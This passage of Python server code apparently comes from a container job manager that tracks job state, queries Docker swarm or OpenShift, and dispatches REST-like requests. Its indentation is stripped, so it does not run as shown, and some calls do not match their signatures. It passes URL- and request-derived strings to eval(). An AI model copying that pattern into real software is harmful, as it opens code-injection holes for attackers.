# the job does not happen and the job indexing ends up missing several epochs:
#
# l_subJobsStart (pre) = [0, 1, 2, 3, 4]
# l_subJobsEnd (pre) = [0, 1, 3, 4]
#
# To ensure a correct returncode lookup, we always parse the latest job epoch.
latestJob = 0
if len(l_subJobsEnd):
latestJob = l_subJobsEnd[-1]
for j in list(range(0, latestJob+1)):
l_subJobsEnd[j] = Te.cat('/%s/end/%s/endInfo/%d/returncode' % (job, latestJob, j))
T_container = False
str_container_name = None
for container_name in CONTAINER_NAMES:
if p.exists(container_name, path = '/%s' % job):
T_container = C_stree()
p.copy(startPath = '/%s/%s' % (job, container_name), destination = T_container)
str_container_name = container_name
break
if str_container_name:
d_ret[str(hits)+'.'+str_container_name] = {"jobRoot": job, "tree": dict(T_container.snode_root)}
else:
d_ret[str(hits)+'.container'] = {"jobRoot": job, "tree": None}
d_ret[str(hits)+'.start'] = {"jobRoot": job, "startTrigger": l_subJobsStart}
d_ret[str(hits)+'.end'] = {"jobRoot": job, "returncode": l_subJobsEnd}
hits += 1
if not hits:
d_ret['-1.start'] = {"jobRoot": None, "startTrigger": None}
d_ret['-1.end'] = {"jobRoot": None, "returncode": None}
d_ret['-1.container'] = {"jobRoot": None, "tree": None}
else:
b_status = True
return {"hits": hits,
"d_ret": d_ret,
"status": b_status}
def t_done_process(self, *args, **kwargs):
"""
Check if the job corresponding to the search pattern is "done".
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In done process...")
return self.job_state(*args, **kwargs)
def t_status_process(self, *args, **kwargs):
"""
This method is the main (threaded) entry point for returning
information on the status of jobs (both active and historical)
that have been (or are currently) managed by pman.
Originally, the concept of "job" only extended to a command
line process spawned off on the underlying shell. With time,
however, this concept expanded to encompass processes that
are containerized.
While most (if not all) of the use of pman currently is to
handle containerized compute, the status determination logic
still retains the ability to query simple spawned jobs.
The determination about whether or not a job has been
containerized is quite simple -- a token in the internal
job "state" memory structure (the main pman stree "DB")
is checked -- this initial chunk of data is returned by a
call to self.job_state() which delivers a dictionary
representation of the jobRoot in the DB tree.
:param args:
:param kwargs:
:return: dictionary of components defining job state.
"""
self.dp.qprint("In status process...")
# pudb.set_trace()
d_state = self.job_state(*args, **kwargs)
# {
# "hits": hits,
# "d_ret":
# [<index>+'.'+str_container_name] = {
# "jobRoot": job, "tree": dict(T_container.snode_root)
# },
# "status": b_status
# }
d_ret = d_state['d_ret']
b_status = d_state['status']
d_keys = d_ret.items()
l_status = []
l_logs = []
#
# The d_ret keys consist of groups of
#
# *.start
# *.end
# *.container
#
# thus the loop grouping is number of items / 3
#
for i in range(0, int(len(d_keys)/3)):
b_startEvent = d_ret['%s.start' % str(i)]['startTrigger'][0]
try:
endcode = d_ret['%s.end' % str(i)]['returncode'][0]
except:
endcode = None
# pudb.set_trace()
# Was this a containerized job?
found_container = False
## Huh? Why loop over both "container" and "openshift"???
# for container_name in CONTAINER_NAMES:
for container_name in ['container']:
container_path = '%s.%s' % (str(i), container_name)
if container_path in d_state['d_ret'] and d_state['d_ret'][container_path]['tree']:
kwargs['d_state'] = d_state
kwargs['hitIndex'] = str(i)
d_containerStatus = eval("self.t_status_process_%s(*args, **kwargs)" % container_name)
# d_ret {
# 'status': d_ret['status'], # bool
# 'logs': str_logs, # logs from app in container
# 'currentState': d_ret['d_process']['state'] # string of 'finishedSuccessfully' etc
# }
l_status.append(d_containerStatus['currentState'])
l_logs.append(d_containerStatus['logs'])
found_container = True
# The case for non-containerized jobs
if not found_container:
if endcode is None and b_startEvent:
l_status.append('started')
if not endcode and b_startEvent and type(endcode) is int:
l_status.append('finishedSuccessfully')
if endcode and b_startEvent:
l_status.append('finishedWithError')
self.dp.qprint('b_startEvent = %d' % b_startEvent)
self.dp.qprint(endcode)
self.dp.qprint('l_status = %s' % l_status)
d_ret['l_status'] = l_status
d_ret['l_logs'] = l_logs
return {
"d_ret": d_ret,
"status": b_status
}
def DB_store(self, data, str_path, str_file):
"""
In the DB memory tree, simply stores <data> to a location called
<str_path> and a file called <str_file>.
Explicitly separating <str_path> and <str_file> is just for
expedience in checking up on path validity in the DB memory tree.
This method also triggers a DB save event.
"""
if not self._ptree.exists(str_file, path = str_path):
self._ptree.touch('%s/%s' % (str_path, str_file), data)
# Save DB state...
self.within.DB_fileIO(cmd = 'save')
def t_status_process_container_stateObject(self, *args, **kwargs):
"""
This method processes the swarm manager state object and, if
necessary, shuts down the service from the swarm scheduler.
PRECONDITIONS:
o This method should only ever be called by t_status_process_container().
POSTCONDITIONS:
o A string denoting the current state is returned.
o If state is complete and service still running, save state object to
tree and remove service.
o Store the state object and logs in the internal DB tree!
"""
def service_exists(str_serviceName):
"""
Returns a bool:
- True: <str_serviceName> does exist
- False: <str_serviceName> does not exist
"""
b_exists = False
client = docker.from_env()
try:
service = client.services.get(str_serviceName)
b_exists = True
except:
b_exists = False
return b_exists
def service_shutDown_check():
"""
Verifies that a docker service can be shutdown.
If multiple jobs have been scheduled serially with the same
jid/serviceName, then the actual service can only be shut
down once all identical jobs have had their state stored.
Returns bool:
- True: can shut down
- False: cannot shut down
"""
ret = False
if int(str_hitIndex) < int(d_jobState['hits'])-1:
ret = False
else:
ret = True
return ret
def service_shutDown(d_serviceInfo):
"""
Shut down a service
"""
client = docker.from_env()
str_cmdShutDown = '%s --remove %s' % \
(d_serviceInfo['managerApp'], d_serviceInfo['serviceName'])
byte_str = client.containers.run(
'%s' % d_serviceInfo['managerImage'],
str_cmdShutDown,
volumes = {
'/var/run/docker.sock':
{
'bind': '/var/run/docker.sock',
'mode': 'rw'
}
},
remove=True)
return byte_str
# pudb.set_trace()
d_serviceState = None
d_jobState = None
str_hitIndex = "0"
str_logs = ""
str_ret = {'state': 'undefined', 'logs': 'undefined'}
b_shutDownService = False
for k,v in kwargs.items():
if k == 'jobState': d_jobState = v
if k == 'serviceState': d_serviceState = v
if k == 'hitIndex': str_hitIndex = v
if k == 'logs': str_logs = v
# Add a clumsy descriptor of this container "type" for processing
# by the t_status_process_state() method.
kwargs['containerType'] = 'container'
if d_serviceState:
d_ret = self.t_status_process_state(**kwargs)
# d_ret {
# 'currentState': str_currentState,
# 'removeJob': b_removeJob,
# 'status': True
# }
if d_ret['removeJob']:
str_jobRoot = d_jobState['d_ret']['%s.%s' % (str_hitIndex, kwargs['containerType'])]['jobRoot']
self._ptree.cd('/%s/container' % str_jobRoot)
d_serviceInfo = {
'serviceName': self._ptree.cat('manager/env/serviceName'),
'managerImage': self._ptree.cat('manager/image'),
'managerApp': self._ptree.cat('manager/app')
}
if service_exists(d_serviceInfo['serviceName']):
service_shutDown(d_serviceInfo)
return {
'status': True,
'd_process': d_ret
}
def t_status_process_container(self, *args, **kwargs):
"""
Execution should only reach this method for "container"ized jobs
status determination!
The 'd_state' contains a dictionary representation of the container
DB tree.
PRECONDITIONS:
o Only call this method if a container structure exists
in the relevant job tree!
POSTCONDITIONS:
o If the job is completed, then shutdown the container cluster
service.
o The memory container tree contains a dictionary called 'state'
that is the state returned by the container service, as well as
a file called 'logs' that is the stdout/stderr generated by the
job as it ran in the container.
"""
d_state = None
str_jobRoot = ''
str_hitIndex = "0"
for k,v in kwargs.items():
if k == 'd_state': d_state = v
if k == 'hitIndex': str_hitIndex = v
self.dp.qprint('checking on status using container...')
str_jobRoot = d_state['d_ret']['%s.container' % str_hitIndex]['jobRoot']
self._ptree.cd('/%s/container' % str_jobRoot)
str_serviceName = self._ptree.cat('manager/env/serviceName')
str_managerImage = self._ptree.cat('manager/image')
str_managerApp = self._ptree.cat('manager/app')
# pudb.set_trace()
# Check if the state of the container service has been recorded to the data tree
if self._ptree.exists('state', path = '/%s/container' % str_jobRoot):
# If this exists, then the job has actually completed and
# its state has been recorded in the data tree. We can simply 'cat'
# the state from this memory dictionary
d_serviceState = self._ptree.cat('/%s/container/state' % str_jobRoot)
if self._ptree.exists('logs', path = '/%s/container' % str_jobRoot):
# The job has actually completed and its logs are recorded in the data tree
str_logs = self._ptree.cat('/%s/container/logs' % str_jobRoot)
else:
# Here, the manager has not been queried yet about the state of
# the service. We need to ask the container service for this
# state, and then record the state (and logs) in the memory
# tree, and then "shut down" the service.
client = docker.from_env()
# pudb.set_trace()
# Get the state of the service...
str_cmdManager = '%s --state %s' % \
(str_managerApp, str_serviceName)
byte_str = client.containers.run(
'%s' % str_managerImage,
str_cmdManager,
volumes = {
'/var/run/docker.sock':
{
'bind': '/var/run/docker.sock',
'mode': 'rw'
}
},
remove = True)
d_serviceState = json.loads(byte_str.decode())
# Now, parse for the logs of the actual container run by the service:
# NB: This has only really been tested/used on swarm!!
str_contID = d_serviceState['Status']['ContainerStatus']['ContainerID']
container = client.containers.get(str_contID)
str_logs = container.logs()
str_logs = str_logs.decode()
d_ret = self.t_status_process_container_stateObject(
hitIndex = str_hitIndex,
jobState = d_state,
serviceState = d_serviceState,
logs = str_logs
)
# d_ret {
# 'status': bool,
# d_process: {
# 'currentState': str_currentState,
# 'removeJob': b_removeJob,
# 'status': True
# }
# }
return {
'status': d_ret['status'],
'logs': str_logs,
'currentState': d_ret['d_process']['currentState']
}
def t_status_process_openshift(self, *args, **kwargs):
"""
Determine the status of a job scheduled using the openshift manager.
PRECONDITIONS:
o Only call this method if a container structure exists
in the relevant job tree!
POSTCONDITIONS:
o If the job is completed, then shutdown the container cluster
service.
"""
return False   # NB: early return -- the openshift status logic below is currently unreachable.
d_state = None
str_jobRoot = ''
str_hitIndex = "0"
for k,v in kwargs.items():
if k == 'd_state': d_state = v
if k == 'hitIndex': str_hitIndex = v
self.dp.qprint('checking on status using openshift...')
str_jobRoot = d_state['d_ret']['%s.openshift' % str_hitIndex]['jobRoot']
self._ptree.cd('/%s' % str_jobRoot)
jid = self._ptree.cat('jid')
# Check if the state of the openshift service has been recorded to the data tree
if self._ptree.exists('state', path = '/%s/openshift' % str_jobRoot):
# The job has actually completed and its state has been recorded in the data tree
d_json = self._ptree.cat('/%s/openshift/state' % str_jobRoot)
else:
d_json = self.get_openshift_manager().state(jid)
return self.t_status_process_openshift_stateObject( hitIndex = str_hitIndex,
jobState = d_state,
serviceState = d_json)
def t_status_process_openshift_stateObject(self, *args, **kwargs):
"""
Process the actual JSON container return object on service
state.
PRECONDITIONS:
o This method should only ever be called by t_status_process_openshift().
POSTCONDITIONS:
o A string denoting the current state is returned.
"""
def job_exists(jid):
"""
Returns a bool:
- True: <jid> does exist
- False: <jid> does not exist
"""
b_exists = False
try:
job = self.get_openshift_manager().get_job(jid)
b_exists = True
except:
b_exists = False
return b_exists
def job_shutDown(d_serviceInfo):
"""
Shut down a service
"""
return self.get_openshift_manager().remove(jid)
d_serviceState = None
d_jobState = None
str_hitIndex = "0"
str_ret = 'undefined'
for k,v in kwargs.items():
if k == 'jobState': d_jobState = v
if k == 'serviceState': d_serviceState = v
if k == 'hitIndex': str_hitIndex = v
if d_serviceState:
str_ret, str_jobRoot, b_removeJob = self.t_status_process_state(
d_serviceState,
d_jobState,
str_hitIndex,
'openshift'
)
if b_removeJob:
self._ptree.cd('/%s' % str_jobRoot)
jid = self._ptree.cat('jid')
if job_exists(jid):
job_shutDown(jid)
return str_ret
def get_openshift_manager(self):
if not self.openshiftmgr:
self.openshiftmgr = OpenShiftManager()
return self.openshiftmgr
def t_status_process_state(self, *args, **kwargs):
"""
This method processes the swarm state object to make the
final determination on a job's state and print out container
job state and logs.
It also returns a signal to the caller to trigger the removal
of the job from the swarm scheduler if the job has completed.
Both the "openshift" and "swarm/container" code calls this,
hence the somewhat clumsy passing of a string token. Probably
not the best design...
"""
def debug_print( str_jobRoot,
d_serviceState,
str_currentState,
str_logs
):
"""
Simply print some useful debug info.
"""
l_commsNorm = ['rx', 'rx', 'tx']
l_commsErr = ['error', 'error', 'error']
l_comms = l_commsNorm
if str_currentState == 'finishedWithError':
l_comms = l_commsErr
self.dp.qprint('\njobRoot %s\n-->%s<--...' % \
(str_jobRoot,
str_currentState),
comms = l_comms[0])
self.dp.qprint('\n%s' % self.df_print(d_serviceState),
comms = l_comms[1])
self.dp.qprint('\njob logs:\n%s' % str_logs,
comms = l_comms[2])
d_serviceState = {}
d_jobState = {}
str_hitIndex = "0"
str_logs = ""
str_containerType = ""
for k,v in kwargs.items():
if k == 'jobState': d_jobState = v
if k == 'serviceState': d_serviceState = v
if k == 'hitIndex': str_hitIndex = v
if k == 'logs': str_logs = v
if k == 'containerType': str_containerType = v
# pudb.set_trace()
b_removeJob = False
str_jobRoot = d_jobState['d_ret']['%s.%s' % (str_hitIndex, str_containerType)]['jobRoot']
str_state = d_serviceState['Status']['State']
str_message = d_serviceState['Status']['Message']
str_contID = d_serviceState['Status']['ContainerStatus']['ContainerID']
if str_state == 'running' and str_message == 'started':
str_currentState = 'started'
debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
else:
self.DB_store(d_serviceState, '/%s/%s' % (str_jobRoot, str_containerType), 'state')
self.DB_store(str_logs, '/%s/%s' % (str_jobRoot, str_containerType), 'logs')
b_removeJob = True
if str_state == 'failed' and str_message == 'started':
str_currentState = 'finishedWithError'
debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
elif str_state == 'complete' and str_message == 'finished':
str_currentState = 'finishedSuccessfully'
debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
self.DB_store(str_currentState, '/%s/%s' % (str_jobRoot, str_containerType), 'currentState')
return {
'currentState': str_currentState,
'removeJob': b_removeJob,
'status': True
}
def t_hello_process(self, *args, **kwargs):
"""
The 'hello' action is merely to 'speak' with the server. The server
can return current date/time, echo back a string, query the startup
command line args, etc.
This method is a simple means of checking if the server is "up" and
running.
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In hello process...")
b_status = False
d_ret = {}
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if 'askAbout' in d_meta.keys():
str_askAbout = d_meta['askAbout']
d_ret['name'] = self.within.str_name
d_ret['version'] = self.within.str_version
if str_askAbout == 'timestamp':
str_timeStamp = datetime.datetime.today().strftime('%Y%m%d%H%M%S.%f')
d_ret['timestamp'] = {}
d_ret['timestamp']['now'] = str_timeStamp
b_status = True
if str_askAbout == 'sysinfo':
d_ret['sysinfo'] = {}
d_ret['sysinfo']['system'] = platform.system()
d_ret['sysinfo']['machine'] = platform.machine()
d_ret['sysinfo']['platform'] = platform.platform()
d_ret['sysinfo']['uname'] = platform.uname()
d_ret['sysinfo']['version'] = platform.version()
d_ret['sysinfo']['memory'] = psutil.virtual_memory()
d_ret['sysinfo']['cpucount'] = multiprocessing.cpu_count()
d_ret['sysinfo']['loadavg'] = os.getloadavg()
d_ret['sysinfo']['cpu_percent'] = psutil.cpu_percent()
d_ret['sysinfo']['hostname'] = socket.gethostname()
d_ret['sysinfo']['inet'] = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
b_status = True
if str_askAbout == 'echoBack':
d_ret['echoBack'] = {}
d_ret['echoBack']['msg'] = d_meta['echoBack']
b_status = True
return { 'd_ret': d_ret,
'status': b_status}
def t_run_process(self, *args, **kwargs):
"""
Main job handler -- this is in turn a thread spawned from the
parent listener thread.
By being threaded, the client http caller gets an immediate
response without needing to wait for the jobs to actually run
to completion.
"""
str_cmd = ""
d_request = {}
d_meta = {}
d_Tcontainer = {}
for k,v in kwargs.items():
if k == 'request': d_request = v
if k == 'treeList': d_Tcontainer = v
d_meta = d_request['meta']
if d_meta:
self.jid = d_meta['jid']
self.auid = d_meta['auid']
str_cmd = d_meta['cmd']
if isinstance(self.jid, int):
self.jid = str(self.jid)
self.dp.qprint("spawning and starting poller thread")
# Start the 'poller' worker
self.poller = Poller(cmd = str_cmd,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile)
self.poller.start()
str_timeStamp = datetime.datetime.today().strftime('%Y%m%d%H%M%S.%f')
str_uuid = uuid.uuid4()
str_dir = '%s_%s' % (str_timeStamp, str_uuid)
self.str_jobRootDir = str_dir
b_jobsAllDone = False
p = self._ptree
p.cd('/')
p.mkcd(str_dir)
if d_Tcontainer:
# Save the trees in this list to the DB...
for name,tree in d_Tcontainer.items():
p.mkcd(name)
tree.copy(startPath = '/', destination = p, pathDiskRoot = '/%s/%s' % (str_dir, name))
p.cd('/%s' % str_dir)
p.touch('d_meta', json.dumps(d_meta))
p.touch('cmd', str_cmd)
if len(self.auid):
p.touch('auid', self.auid)
if len(self.jid):
p.touch('jid', self.jid)
p.mkdir('start')
p.mkdir('end')
jobCount = 0
p.touch('jobCount', jobCount)
while not b_jobsAllDone:
try:
b_jobsAllDone = self.poller.queueAllDone.get_nowait()
except queue.Empty:
self.dp.qprint('Waiting on start job info')
d_startInfo = self.poller.queueStart.get()
str_startDir = '/%s/start/%d' % (self.str_jobRootDir, jobCount)
p.mkdir(str_startDir)
p.cd(str_startDir)
p.touch('startInfo', d_startInfo.copy())
p.touch('/%s/startInfo' % str_dir, d_startInfo.copy())
self.dp.qprint('Waiting on end job info')
d_endInfo = self.poller.queueEnd.get()
str_endDir = '/%s/end/%d' % (self.str_jobRootDir, jobCount)
p.mkdir(str_endDir)
p.cd(str_endDir)
p.touch('endInfo', d_endInfo.copy())
p.touch('/%s/endInfo' % str_dir, d_endInfo.copy())
p.touch('/%s/jobCount' % str_dir, jobCount)
jobCount += 1
self.dp.qprint('All jobs processed.')
# Save DB state...
self.within.DB_fileIO(cmd = 'save')
def t_run_process_container(self, *args, **kwargs):
"""
A threaded run method specialized to handling containerized managers and targets.
NOTE: if 'serviceName' is not specified in the manager 'env', it defaults
to the 'jid' value.
Typical JSON d_request:
{ "action": "run",
"meta": {
"cmd": "$execshell $selfpath/$selfexec --prefix test- --sleepLength 0 /share/incoming /share/outgoing",
"auid": "rudolphpienaar",
"jid": "simpledsapp-1",
"threaded": true,
"container": {
"target": {
"image": "fnndsc/pl-simpledsapp",
"cmdParse": true
},
"manager": {
"image": "fnndsc/swarm",
"app": "swarm.py",
"env": {
"shareDir": "/home/tmp/share",
"serviceType": "docker",
"serviceName": "testService"
}
}
}
}
}
"""
str_cmd = ""
str_shareDir = ""
str_serviceName = ""
d_request = {}
d_meta = {}
d_container = {}
d_image = {}
d_manager = {}
d_env = {}
self.dp.qprint('Processing swarm-type job...')
for k,v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
# pudb.set_trace()
if d_meta:
self.jid = d_meta['jid']
self.auid = d_meta['auid']
str_cmd = d_meta['cmd']
str_serviceName = self.jid
if 'container' in d_meta.keys():
d_container = d_meta['container']
d_target = d_container['target']
str_targetImage = d_target['image']
d_manager = d_container['manager']
str_managerImage = d_manager['image']
str_managerApp = d_manager['app']
d_env = d_manager['env']
# pudb.set_trace()
if 'shareDir' in d_env.keys():
str_shareDir = d_env['shareDir']
if 'STOREBASE' in os.environ:
str_storeBase = os.environ['STOREBASE']
(str_origBase, str_key) = os.path.split(str_shareDir)
self.dp.qprint('Overriding shareDir (orig): %s' % str_shareDir)
str_shareDir = os.path.join(str_storeBase, str_key)
self.dp.qprint('Overriding shareDir (new): %s' % str_shareDir)
if 'serviceName' in d_env.keys():
str_serviceName = d_env['serviceName']
else:
d_env['serviceName'] = str_serviceName
# First, attach to the docker daemon...
client = docker.from_env()
#
# If 'container/cmdParse', get a JSON representation of the image and
# parse the cmd for substitutions -- this replaces any of
# $execshell, $selfpath, and/or $selfexec with the values provided
# in the JSON representation.
#
if d_target['cmdParse']:
byte_str = client.containers.run(str_targetImage)
d_jsonRep = json.loads(byte_str.decode())
for str_meta in ['execshell', 'selfexec', 'selfpath']:
str_cmd = str_cmd.replace("$"+str_meta, d_jsonRep[str_meta])
str_cmdLine = str_cmd
str_cmdManager = '%s -s %s -m %s -i %s -p none -c "%s"' % \
(str_managerApp, str_serviceName, str_shareDir, str_targetImage, str_cmdLine)
try:
byte_str = client.containers.run('%s' % str_managerImage,
str_cmdManager,
volumes = {'/var/run/docker.sock': {'bind': '/var/run/docker.sock', 'mode': 'rw'}},
remove = True)
except Exception as e:
# An exception here most likely occurs due to a serviceName collision.
# Solution is to stop the service and retry.
str_e = '%s' % e
print(str_e)
# Call the "parent" method -- reset the cmdLine to an "echo"
# and create an stree off the 'container' dictionary to store
# in the pman DB entry.
d_meta['cmd'] = 'echo "%s"' % str_cmd
T_container = C_stree()
T_container.initFromDict(d_container)
d_Tcontainer = {'container': T_container}
self.t_run_process(request = d_request,
treeList = d_Tcontainer)
self.dp.qprint('Returning from swarm-type job...')
def t_run_process_openshift(self, *args, **kwargs):
"""
A threaded run method specialized for handling openshift
Typical JSON d_request:
{ "action": "run",
"meta": {
"cmd": "$execshell $selfpath/$selfexec --prefix test- --sleepLength 0 /share/incoming /share/outgoing",
"auid": "rudolphpienaar",
"jid": "simpledsapp-1",
"threaded": true,
"openshift": {
"target": {
"image": "fnndsc/pl-simpledsapp",
"cmdParse": true
}
}
}
}
"""
str_cmd = ""
d_request = {}
d_meta = {}
d_openshift = {}
d_image = {}
self.dp.qprint('Processing openshift job...')
for k,v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if d_meta:
self.jid = d_meta['jid']
self.auid = d_meta['auid']
str_cmd = d_meta['cmd']
if 'openshift' in d_meta.keys():
d_openshift = d_meta['openshift']
d_target = d_openshift['target']
str_targetImage = d_target['image']
#
# If 'openshift/cmdParse', get a JSON representation of the image and
# parse the cmd for substitutions -- this replaces any of
# $execshell, $selfpath, and/or $selfexec with the values provided
# in the JSON representation.
#
if d_target['cmdParse']:
cmdparse_pod_name = self.jid + '-cmdparse'
self.get_openshift_manager().create_pod(str_targetImage, cmdparse_pod_name)
count = 0
log = None
while count < 10:
try:
pod = self.get_openshift_manager().get_pod_status(cmdparse_pod_name)
if pod.status.container_statuses[0].state.terminated.exit_code == 0:
log = self.get_openshift_manager().get_pod_log(cmdparse_pod_name)
break
except Exception as e:
str_e = '%s' % e
count += 1
time.sleep(1)
d_cmdparse = ast.literal_eval(log)
for str_meta in ['execshell', 'selfexec', 'selfpath']:
str_cmd = str_cmd.replace("$"+str_meta, d_cmdparse[str_meta])
str_cmdLine = str_cmd
self.get_openshift_manager().schedule(str_targetImage, str_cmdLine, self.jid)
# Call the "parent" method -- reset the cmdLine to an "echo"
# and create an stree off the 'openshift' dictionary to store
# in the pman DB entry.
d_meta['cmd'] = 'echo "%s"' % str_cmd
T_openshift = C_stree()
T_openshift.initFromDict(d_openshift)
d_Topenshift = {'openshift': T_openshift}
self.t_run_process(request = d_request,
treeList = d_Topenshift)
self.dp.qprint('Returning from openshift job...')
def json_filePart_get(self, **kwargs):
"""
If the requested path is *within* a json "file" on the
DB, then we need to find the file, and map the relevant
path to components in that file.
"""
def DB_get(self, **kwargs):
"""
Returns part of the DB tree based on path spec in the URL
"""
r = C_stree()
p = self._ptree
pcwd = p.cwd()
str_URLpath = "/api/v1/"
for k,v in kwargs.items():
if k == 'path': str_URLpath = v
str_path = '/' + '/'.join(str_URLpath.split('/')[3:])
self.dp.qprint("path = %s" % str_path)
if str_path == '/':
# If root node, only return list of jobs
l_rootdir = p.lstr_lsnode(str_path)
r.mknode(l_rootdir)
else:
# Here is a hidden behaviour: if the 'root' dir starts
# with an underscore, then that component of the path is
# replaced with the actual job name at that list offset.
# This is simply a shorthand way to access indexed
# offsets -- for example, '/_0/cmd' resolves to the 'cmd'
# entry of the first job in the listing.
l_path = str_path.split('/')
jobID = l_path[1]
# Does the jobID start with an underscore?
if jobID[0] == '_':
jobOffset = jobID[1:]
l_rootdir = list(p.lstr_lsnode('/'))
self.dp.qprint('jobOffset = %s' % jobOffset)
self.dp.qprint(l_rootdir)
try:
actualJob = l_rootdir[int(jobOffset)]
except:
return False
l_path[1] = actualJob
str_path = '/'.join(l_path)
r.mkdir(str_path)
r.cd(str_path)
r.cd('../')
# if not r.graft(p, str_path):
# pudb.set_trace()
if not p.copy(startPath = str_path, destination = r)['status']:
# We are probably trying to access a file...
# First, remove the erroneous path in the return DB
r.rm(str_path)
# Now, we need to find the "file", parse the json layer
# and save...
n = 0
contents = p.cat(str_path)
str_pathFile = str_path
l_path = str_path.split('/')
totalPathLen = len(l_path)
l_pathFile = []
while not contents and -1*n < totalPathLen:
n -= 1
str_pathFile = '/'.join(str_path.split('/')[0:n])
contents = p.cat(str_pathFile)
l_pathFile.append(l_path[n])
if contents and n<0:
l_pathFile = l_pathFile[::-1]
str_access = ""
for l in l_pathFile:
str_access += "['%s']" % l
self.dp.qprint('str_access = %s' % str_access)
try:
contents = eval('contents%s' % str_access)
except:
contents = False
r.touch(str_path, contents)
p.cd(pcwd)
self.dp.qprint(r)
# self.dp.qprint(dict(r.snode_root))
self.dp.qprint(self.pp.pformat(dict(r.snode_root)).strip())
return dict(r.snode_root)
# return r
def process(self, request, **kwargs):
""" Process the message from remote client
In some philosophical respects, this process() method in fact implements
REST-like API of its own.
"""
if len(request):
REST_header = ""
REST_verb = ""
str_path = ""
json_payload = ""
self.dp.qprint("Listener ID - %s: process() - handling request" % (self.worker_id))
now = datetime.datetime.today()
str_timeStamp = now.strftime('%Y-%m-%d %H:%M:%S.%f')
self.dp.qprint(Colors.YELLOW)
self.dp.qprint("***********************************************")
self.dp.qprint("***********************************************")
self.dp.qprint("%s incoming data stream" % (str_timeStamp) )
self.dp.qprint("***********************************************")
self.dp.qprint("len = %d" % len(request))
self.dp.qprint("***********************************************")
self.dp.qprint(Colors.CYAN + "%s\n" % (request.decode()) + Colors.YELLOW)
self.dp.qprint("***********************************************" + Colors.NO_COLOUR)
l_raw = request.decode().split('\n')
FORMtype = l_raw[0].split('/')[0]
self.dp.qprint('Request = ...')
self.dp.qprint(l_raw)
REST_header = l_raw[0]
REST_verb = REST_header.split()[0]
str_path = REST_header.split()[1]
json_payload = l_raw[-1]
# remove trailing '/' if any on path
if str_path[-1] == '/': str_path = str_path[0:-1]
d_ret = {'status': False,
'RESTheader': REST_header,
'RESTverb': REST_verb,
'action': "",
'path': str_path,
'receivedByServer': l_raw}
if REST_verb == 'GET':
d_ret['GET'] = self.DB_get(path = str_path)
d_ret['status'] = True
self.dp.qprint('json_payload = %s' % self.pp.pformat(json_payload).strip())
d_ret['client_json_payload'] = json_payload
d_ret['client_json_len'] = len(json_payload)
if len(json_payload):
d_payload = json.loads(json_payload)
d_request = d_payload['payload']
payload_verb = d_request['action']
if 'meta' in d_request.keys():
d_meta = d_request['meta']
d_ret['payloadsize']= len(json_payload)
if payload_verb == 'quit':
self.dp.qprint('Shutting down server...')
d_ret['status'] = True
if payload_verb == 'run' and REST_verb == 'PUT':
d_ret['action'] = payload_verb
self.processPUT( request = d_request)
d_ret['status'] = True
if REST_verb == 'POST':
self.processPOST( request = d_request,
ret = d_ret)
return d_ret
else:
return False
def methodName_parse(self, **kwargs):
"""
Construct the processing method name (string) by parsing the
d_meta dictionary.
"""
d_meta = {}
d_container = {}
str_method = "" # The main 'parent' method
str_methodSuffix = "" # A possible 'subclass' specialization
for k,v in kwargs.items():
if k == 'request': d_request= v
payload_verb = d_request['action']
if 'meta' in d_request.keys():
d_meta = d_request['meta']
for container_name in CONTAINER_NAMES:
if container_name in d_meta.keys():
# If the `container_name` json paragraph exists, then route processing to
# a suffixed '_<container_name>' method.
str_methodSuffix = '_%s' % container_name
break
str_method = 't_%s_process%s' % (payload_verb, str_methodSuffix)
return str_method
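# Illustrative dispatch (assuming CONTAINER_NAMES covers 'container' and
# 'openshift'): an action of "run" whose meta contains a "container" block
# resolves to 't_run_process_container', while a plain "status" action with
# no container block resolves to 't_status_process'.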
def processPOST(self, **kwargs):
"""
Dispatcher for POST
"""
for k,v in kwargs.items():
if k == 'request': d_request = v
if k == 'ret': d_ret = v
payload_verb = d_request['action']
if 'meta' in d_request.keys():
d_meta = d_request['meta']
d_ret['action'] = payload_verb
d_ret['meta'] = d_meta
b_threaded = False
if 'threaded' in d_meta.keys():
b_threaded = d_meta['threaded']
if b_threaded:
self.dp.qprint("Will process request in new thread.")
pf_method = None
# pudb.set_trace()
str_method = self.methodName_parse(request = d_request)
# str_method = 't_%s_process' % payload_verb
try:
pf_method = getattr(self, str_method)
except AttributeError:
raise NotImplementedError("Class `{}` does not implement `{}`".format(pman.__class__.__name__, str_method))
t_process = threading.Thread( target = pf_method,
args = (),
kwargs = kwargs)
t_process.start()
time.sleep(0.1)
if payload_verb == 'run':
d_ret['jobRootDir'] = self.str_jobRootDir
d_ret['status'] = True
else:
self.dp.qprint("Will process request in current thread.")
d_done = eval("self.t_%s_process(request = d_request)" % payload_verb)
try:
d_ret['d_ret'] = d_done["d_ret"]
d_ret['status'] = d_done["status"]
except:
self.dp.qprint("An error occurred in reading ret structure. Should this method have been threaded?")
return d_ret
def processPUT(self, **kwargs):
"""
Dispatcher for PUT
"""
d_request = {}
str_action = "run"
str_cmd = "save"
str_DBpath = self.str_DBpath
str_fileio = "json"
tree_DB = self._ptree
for k,v in kwargs.items():
if k == 'request': d_request = v
str_action = d_request['action']
self.dp.qprint('action = %s' % str_action)
d_meta = d_request['meta']
self.dp.qprint('action = %s' % str_action)
# Optional search criteria
if 'key' in d_meta:
d_search = self.t_search_process(request = d_request)['d_ret']
p = self._ptree
Tj = C_stree()
Tdb = C_stree()
for j in d_search.keys():
d_j = d_search[j]
for job in d_j.keys():
str_pathJob = '/api/v1/' + job
d_job = self.DB_get(path = str_pathJob)
Tj.initFromDict(d_job)
Tj.copy(startPath = '/', destination = Tdb)
# Tdb.graft(Tj, '/')
# self.DB_get(path = str_pathJob).copy(startPath = '/', destination = Tdb)
# print(Tdb)
tree_DB = Tdb
if 'context' in d_meta: str_context = d_meta['context']
